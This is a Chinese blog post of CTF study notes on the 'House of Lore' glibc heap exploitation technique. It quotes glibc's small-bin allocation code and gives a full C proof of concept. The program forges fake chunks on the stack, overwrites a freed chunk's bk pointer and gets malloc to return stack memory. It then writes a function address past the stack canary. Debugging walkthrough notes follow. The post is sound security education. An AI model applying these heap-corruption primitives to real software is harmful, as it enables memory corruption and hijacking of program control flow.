House of Lore

于 2024-07-29 19:24:22 发布
阅读量444 收藏 17
点赞数 21
分类专栏: pwn 文章标签: ctfer 笔记 pwn house of lore
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yjh_fnu_ltn/article/details/140778952
版权

House of Lore

概述:

  1. House of Lore 攻击与 Glibc 堆管理中的 Small Bin 的机制紧密相关。
  2. House of Lore 可以实现分配任意指定位置的 chunk,从而修改任意地址的内存。
  3. House of Lore 利用的前提是需要控制 Small Bin Chunk 的 bk 指针,并且控制指定位置 chunk 的 fd 指针。

基本原理:

  1. 如果在 malloc 的时候,申请的内存块在 small bin 范围内,那么执行的流程如下:

        /*
       If a small request, check regular bin.  Since these "smallbins"
       hold one size each, no searching within bins is necessary.
       (For a large request, we need to wait until unsorted chunks are
       processed to find best fit. But for small ones, fits are exact
       anyway, so we can check now, which is faster.)
     */

    if (in_smallbin_range(nb)) {
        // 获取 small bin 的索引
        idx = smallbin_index(nb);
        // 获取对应 small bin 中的 chunk 指针
        bin = bin_at(av, idx);
        // 先执行 victim= last(bin),获取 small bin 的最后一个 chunk
        // 如果 victim = bin ,那说明该 bin 为空。
        // 如果不相等,那么会有两种情况
        if ((victim = last(bin)) != bin) {
            // 第一种情况,small bin 还没有初始化。
            if (victim == 0) /* initialization check */
                // 执行初始化,将 fast bins 中的 chunk 进行合并
                malloc_consolidate(av);
            // 第二种情况,small bin 中存在空闲的 chunk
            else {
                // 获取 small bin 中倒数第二个 chunk 。
                bck = victim->bk;
                // 检查 bck->fd 是不是 victim,防止伪造
                if (__glibc_unlikely(bck->fd != victim)) {
                    errstr = "malloc(): smallbin double linked list corrupted";
                    goto errout;
                }
                // 设置 victim 对应的 inuse 位
                set_inuse_bit_at_offset(victim, nb);
                // 修改 small bin 链表,将 small bin 的最后一个 chunk 取出来
                bin->bk = bck;
                bck->fd = bin;
                // 如果不是 main_arena,设置对应的标志
                if (av != &main_arena) set_non_main_arena(victim);
                // 细致的检查
                check_malloced_chunk(av, victim, nb);
                // 将申请到的 chunk 转化为对应的 mem 状态
                void *p = chunk2mem(victim);
                // 如果设置了 perturb_type , 则将获取到的chunk初始化为 perturb_type ^ 0xff
                alloc_perturb(p, bytes);
                return p;
            }
        }
    }

    从下面的这部分我们可以看出,如果我们可以修改 small bin 的最后一个 chunk 的 bk 为我们指定内存地址的 fake chunk,并且同时 满足bck->fd == victim 的检测(需要伪造两个chunk),那么我们就可以使得 small bin 的 bk 恰好为我们构造的 fake chunk。也就是说,当下一次申请 small bin 的时候,我们就会分配到指定位置的 fake chunk:

                    // 获取 small bin 中倒数第二个 chunk 。
                bck = victim->bk;
                // 检查 bck->fd 是不是 victim,防止伪造
                if (__glibc_unlikely(bck->fd != victim)) {
                    errstr = "malloc(): smallbin double linked list corrupted";
                    goto errout;
                }
                // 设置 victim 对应的 inuse 位
                set_inuse_bit_at_offset(victim, nb);
                // 修改 small bin 链表,将 small bin 的最后一个 chunk 取出来
                bin->bk = bck;
                bck->fd = bin;

示例代码:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

void jackpot(){ puts("Nice jump d00d"); exit(0); }

int main(int argc, char * argv[]){


  intptr_t* stack_buffer_1[4] = {0};
  intptr_t* stack_buffer_2[3] = {0};

  fprintf(stderr, "\nWelcome to the House of Lore\n");
  fprintf(stderr, "This is a revisited version that bypass also the hardening check introduced by glibc malloc\n");
  fprintf(stderr, "This is tested against Ubuntu 14.04.4 - 32bit - glibc-2.23\n\n");

  fprintf(stderr, "Allocating the victim chunk\n");
  intptr_t *victim = malloc(100);
  fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim);

  // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk
  intptr_t *victim_chunk = victim-2;

  fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1);
  fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2);

  fprintf(stderr, "Create a fake chunk on the stack");
  fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the check of small bin corrupted"
         "in second to the last malloc, which putting stack address on smallbin list\n");
  stack_buffer_1[0] = 0;
  stack_buffer_1[1] = 0;
  stack_buffer_1[2] = victim_chunk;

  fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 "
         "in order to bypass the check of small bin corrupted in last malloc, which returning pointer to the fake "
         "chunk on stack");
  stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
  stack_buffer_2[2] = (intptr_t*)stack_buffer_1;

  fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with"
         "the small one during the free()\n");
  void *p5 = malloc(1000);
  fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5);


  fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
  free((void*)victim);

  fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are nil\n");
  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

  fprintf(stderr, "Now performing a malloc that can't be handled by the UnsortedBin, nor the small bin\n");
  fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim);

  void *p2 = malloc(1200);
  fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2);

  fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n");
  fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]);
  fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);

  //------------VULNERABILITY-----------

  fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");

  victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack

  //------------------------------------

  fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n");
  fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n");

  void *p3 = malloc(100);


  fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n");
  char *p4 = malloc(100);
  fprintf(stderr, "p4 = malloc(100)\n");

  fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n",
         stack_buffer_2[2]);

  fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack
  intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode
  memcpy((p4+40), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary
}

但是需要注意的是:

  1. void *p5 = malloc(1000); 是为了防止和 victim_chunk 之后和 top_chunk 合并。
  2. free((void*)victim),victim 会被放入到 unsort bin 中去:
    • 然后下一次分配的大小如果比它大,那么将从 top chunk 上分配相应大小,而该 chunk 会被取下 link 到相应的 bin 中 (smallbin 或是 large bin)。
    • 如果比它小 (相等则直接返回),则从该 chunk 上切除相应大小,并返回相应 chunk,剩下的成为 last reminder chunk , 还是存在 unsorted bin 中。

调试分析:

  1. 这三个位置的赋值,是为先后两次申请small bin时绕过检查的:

    image-20240729190133517

    第一处在fake_chunk的fd上放small bin中的chunk地址:

    image-20240729190224111

    第二三次赋值是为了申请fake_chunk时绕过检查:1. 在fake_chunk的bk指针放上fake_chunk2的地址,2. 在fake_chunk2的fd指针上放上fake_chunk1的地址:

    image-20240729190741074

  2. 在这里打上断点,free后观察chunk状态:

    image-20240729180444858

    vicitim顺利进入unsorted bin:

    image-20240729180528527

  3. 这里打断点,malloc之后再观察unsorted bin和small bin的状态:

    image-20240729180735511

    victim成功进入small bin

    image-20240729180839109

  4. 这里修改victim的bk指针

    image-20240729181002115

    成功将bk指向栈上,且栈上的fake chunk的fd指针前面被修改指向victim(绕过检查):

    image-20240729181626738

  5. 申请一个small bin,下一次申请small bin时就会申请到fake chunk(当然也要绕过检查):

    在这里插入图片描述

    image-20240729184409545

  6. 这里申请到fake chunk:

    image-20240729182240901

    image-20240729183132631

总结:

  1. 要利用small bin实现任意地址分配chunk,要满足一下条件:

    • 能修改small bin中chunk(victim)的bk指针:victim–>bk=fake_chunk1。
    • 要能伪造两个fake_chunk1、fake_chunk2,修改fake_chunk1的fd和bk指针,修改fake_chunk2的fd指针:
      • fake_chunk1–>fd = victim 且 fake_chunk1–>bk = fake_chunk2
      • fake_chunk2–>fd = fake_chunk1

  2. 最总实现的效果是,实现任意地址分配chunk:分配到fake_chunk1。

波克比QWQ
关注
  • 21
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn工具箱之house of lore
jmp esp
05-22 1404
前言我看了一些网上对于这些技术的解释,但是发现他们大多比较绕,对于理解其中心思想造成了难度,所以 我在这里把他们记录下来,把这些技术的中心思想记下来,作为自己的pwn工具箱,在以后解决pwn问题的 时候能够随时拿出来发挥作用。我在这里关注的目标是其利用的思想,和其他的一些post不同,利用条件等等这些我个人认为不是能够直 接被总结的,pwn本身的方法多种多样,十分灵活,如果用一些“第一个chu
Ages of Lore-开源
04-26
《传说时代》(Ages of Lore)是一款深受玩家喜爱的开源单人角色扮演游戏,它采用先进的技术,如SDL(Simple DirectMedia Layer)和OpenGL,构建了一个引人入胜的等距游戏世界。作为一款开源软件,它的源代码是公开...
PWNHouse of Lore&House of Rabbit
u014377094的博客
05-04 3614
House of lore House of lore是一种利用small bin的利用方法。 前面我们通过修改unsorted bin与large bin的bk(bk_nextsize)位来造成对”任意“地址的更改。unsorted bin由于修改后,如果无法妥善处理bk指向的chunk的size位、bk位,会造成unsorted bin无法再使用,largebin由于是通过fd_nextsize来便利的,所以下次放入影响会小,而下次取出,假如可取出比修改的chunk小的chunk,还可以继续使用。以
Tcache Stashing Unlink Attack(House of Lore Attack)
tbsqigongzi的博客
08-11 527
Tcache Stashing Unlink Attack
house of lore学习
xiziyunqi的博客
08-01 672
利用思想: 利用smallbin为双向链表,每次malloc取了链表最后一个元素,可以通过更改链表指针,使其分配一个刻意构造的地址 利用难点: 1.需要一个堆溢出或其他方法能够更改到small bin的free chunk的fd和bk指针 2.存在unlink安全检查,需构造好将要malloc出来的位置的chunk(绕过安全检查) 注意:有的触发unlin...
lollibs:与 Lands of Lore 一起使用的 C++ 库
06-20
Lands of Lore: The Throne of Chaos 的实用程序库 添加一名作者 该库提供了用于处理各种 Lands of Lore 格式的实用程序。 支持的格式包括: .ENG、.DIP、.GER、.FRE(参见 Translation.h) .PAK(参见 Package.h...
Lands of Lore Fan Game-开源
07-09
试图为 Westwood 的经典 Lands of Lore 创建非官方续集。
Lore
03-21
萌新学习bukkit插件的首做,大佬勿喷,没有使用经济插件以及权限插件的api适用于全部基于bukkit的服务端内容:...若使用/ lore青鸟(配置文件发现修改)护甲类物品带有此lore可直接开启创造飞行且不会被系统踢出服务器
Lore v1.5.4
03-26
Lore v1.5.4:构建高效知识库系统的利器》 在信息化时代,一个高效的知识管理系统对于任何组织或企业来说都是至关重要的。Lore v1.5.4 正是这样一款专为此目的设计的工具,它以其强大的功能和易用性,帮助用户...
vite5+vue3开发阅读APP实战笔记20240725
Python私教
07-25 428
修改src/page/home/index.vue,使用组件和API。注意,这里无论是组件还是API,都不需要我们手动引入,我们配置了自动导入以后,vite会帮我们自动导入。创建 src/page/home/index.vue。修改 vite.config.js。修改vite.config.js。修改 src/main.js。修改src/App.vue。
学习笔记-系统框图传递函数公式推导
weixin_45875994的博客
07-24 842
输出C(s)是前向路径(通过G(s))的输出与反馈路径(通过H(s))的输出之差(在负反馈系统中)。因此,我们可以写出以下关系式:这里,G(s)R(s)是前向路径的输出,而G(s)H(s)C(s)是反馈路径的输出(注意,反馈路径的输出先经过H(s),再与前向路径的输出相减)。
从零开始学Java(超详细韩顺平老师笔记梳理)08——面向对象编程中级(上)IDEA常用快捷键、包、封装、继承
apple_68589597的博客
07-23 1005
本篇文章是韩顺平老师课程P264-P296(第8章:面向对象编程中级)上半部分重点内容的详细总结,包括IDEA常用快捷键与模板、包的使用与规范、访问修饰符、封装(重点)、继承(重点)
Typora笔记上传到CSDN
m0_48362854的博客
07-25 609
我花了一个小时弄这个 找了很多csdn的笔记 都弄完感觉最方便的还是直接在csdn上写(因为有的之前不是用的阿里云oss 而是gitee 免费仓库 但是好像后来不能使用了 就会导致你上传的笔记图片不显示 很麻烦 使用阿里云或者腾讯云的话 需要花钱 虽然两块钱用一年 但是感觉也是很麻烦 不如直接在网页上写写算了 当然如果笔记图片很多的 还是建议配置一下 )参考这个配置完阿里云oss 没什么问题 但是PicGo也是参考他的 因为版本是旧的 可以点击我下边的官方链接下载。图片的链接是本地的 当然没法显示。
【OpenCV C++20 学习笔记】调节图片对比度和亮度(像素变换)
最新发布
TeamLee的博客
07-25 1058
介绍图片亮度和对比度调整的两种方法:线性变换和非线性变换,并比较它们的优劣
SAP PP学习笔记31 - 计划运行的步骤2 - Scheduling(日程计算),BOM Explosion(BOM展开)
shi_ly的专栏
07-24 796
本章主要讲Scheduling(日程计算),其中包括 外部调达中的调度,生产订单中的调度,修改需求日期(其实就是在物料中增加安全时间和BOM中的提前期偏置量)。另外还讲了BOM展开的内容,详细讲了BOM选择的各种方法,除了按数量选BOM之外,还有其他比如 按日期,按生产版本等,而其中按日期又分为按订单开始日期,订单终了日期等,越趋复杂。
InternLM学习笔记
haveanybody的博客
07-24 263
【代码】InternLM学习笔记
7-23学习笔记
L14173233的博客
07-23 675
/检查性异常 是Exception的直接子类创建对象的方法1 new2 克隆3 反序列化4 反射。
【学习笔记】子集DP
Brute♂force
07-24 974
有一类问题和子集有关。给你一个集合S,令T为S的超集,也就是S所有子集的集合,求T中所有元素的和。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值